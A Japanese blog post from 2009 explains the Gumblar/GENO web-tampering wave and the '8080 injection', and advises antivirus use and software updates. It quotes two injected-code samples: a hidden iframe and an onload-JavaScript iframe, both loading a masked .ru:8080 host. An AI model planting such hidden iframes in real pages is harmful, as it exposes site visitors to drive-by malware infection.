ここから本文です
サイトの改ざん、コンピュータウイルス・セキュリティ、検索エンジンYahoo!/Googleらへん...☆彡

書庫過去の投稿日別表示

全1ページ

[1]

 ブラウザでページを単に見ただけでウイルスが発動してしまう恐れのある「ウェブ改ざん」による不正なコードの埋め込み。今年の5月には、「Gumblarウイルス」(通称「GENOウイルス」)のパンデミックが話題になりましたーな。
正規Web改ざんによるウイルス感染を防ぐには (トレンドマイクロ インターネット・セキュリティ・ナレッジ)

 「GENOウイルス」騒動ほどでないにしろ、今現在でも改ざんされて陥落してる日本国内の一般サイトをたま〜に見かけます。これはページを運営してる人のマシンが、FTPのパスワードを抜くコンピュータウイルスに感染し、外部から不正なコードをページに挿入されてしまう形。:(
Macの端末からだと「攻撃サイトとして報告されています!」〜 (Yahoo!知恵袋)
ホームページのウイルス?スパム?について・・・ (OKWave)

 ちなみに、ここ数週間で何だか目立ってるのが、ロシアドメインへ飛ばすインラインフレームのタグ。「8080攻撃」「8080インジェクション」と呼ばれてるシロモノです。Googleで検索すると、これについて問い合わせてる海外のフォーラムなどのページがたくさんヒットします。(改ざんの実例画像
<iframe src="http://●●●●.ru:8080/index.php" width=** height=**></iframe>
 不正なコードが埋め込まれ「ウイルス発信サイト」へ変貌してしまったページがGogoleの検索結果にヒットすると、『このサイトはコンピュータに損害を与える可能性があります。』と表示され、アクセスがブロックされる場合があります。(Yahoo!検索にはこういう機能はないん)

 ウイルス対策ソフトを導入しとくのは当然ながら、改ざんによる攻撃手法は、多くが有名ソフトウェアの旧バージョンにある不具合(脆弱性)を悪用するので、ちゃんと最新版が入ってるか確認しましょ! :)
・Microsoft系ソフトウェアの更新 → Windows Update
・Adobe系 (Flash Player/Adobe Reader)
 Apple QuickTime
 RealPlayer などの更新



(10月18日 追記...)
 何だか不正なコードが変わり始めてますなぁ。インラインフレームのonload属性にJavaScriptタグを用意して飛ばすスタイル。
<iframe frameborder="0" onload="if (!this.src){ this.src='http://●●●●.ru:8080/index.php'; this.height='0'; this.width='0';}" >(意味のない英文字の羅列)</iframe>



(追記...)
2009年10月、再来襲したGumblar(GENOウイルス)対策

全1ページ

[1]

noooo_spam
noooo_spam
非公開 / 非公開
人気度
Yahoo!ブログヘルプ - ブログ人気度について
1 2 3
4
5
6
7 8
9
10
11
12
13
14
15 16 17
18
19
20 21 22
23
24 25
26
27
28 29 30
検索 検索
友だち(5)
  • Kerupani129
  • ★ピサロ★
  • who
  • Cookies
  • 物知りマン
友だち一覧

よしもとブログランキング

もっと見る
本文はここまでですこのページの先頭へ

[PR]お得情報

数量限定!イオンおまとめ企画
「無料お試しクーポン」か
「値引きクーポン」が必ず当たる!
ふるさと納税サイト『さとふる』
11/30まで5周年記念キャンペーン中!
Amazonギフト券1000円分当たる!

その他のキャンペーン

みんなの更新記事